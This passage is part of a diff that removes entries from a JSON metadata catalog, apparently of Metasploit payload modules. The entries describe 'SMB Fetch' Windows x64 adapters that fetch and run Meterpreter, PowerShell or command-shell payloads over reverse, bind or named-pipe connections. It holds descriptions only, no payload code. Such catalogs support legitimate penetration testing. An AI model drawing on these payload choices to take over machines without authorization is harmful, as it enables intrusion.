Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_tcp": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": 
"windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/peinject/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/peinject/bind_tcp": { - "name": "SMB Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/peinject/bind_tcp_rc4": { - "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/peinject/bind_tcp_uuid": { - "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_named_pipe": { - "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", - "references": [ - 
"URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_tcp_rc4": { - "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": 
"windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/peinject/reverse_tcp_uuid": { - "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/pingback_reverse_tcp": { - "name": "SMB Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/smb/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/powershell_bind_tcp": { - "name": "SMB Fetch", - "fullname": "payload/cmd/windows/smb/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/powershell_reverse_tcp": { - "name": "SMB Fetch", - "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" 
- ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/powershell_reverse_tcp_ssl": { - "name": "SMB Fetch", - "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/shell/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/shell/bind_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows 
x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/shell/bind_tcp_rc4": { - "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - 
"payload_cmd/windows/smb/x64/shell/bind_tcp_uuid": { - "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/shell/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/shell/reverse_tcp_rc4": { - "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/shell/reverse_tcp_uuid": { - "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": 
"payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/shell_bind_tcp": { - "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/smb/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
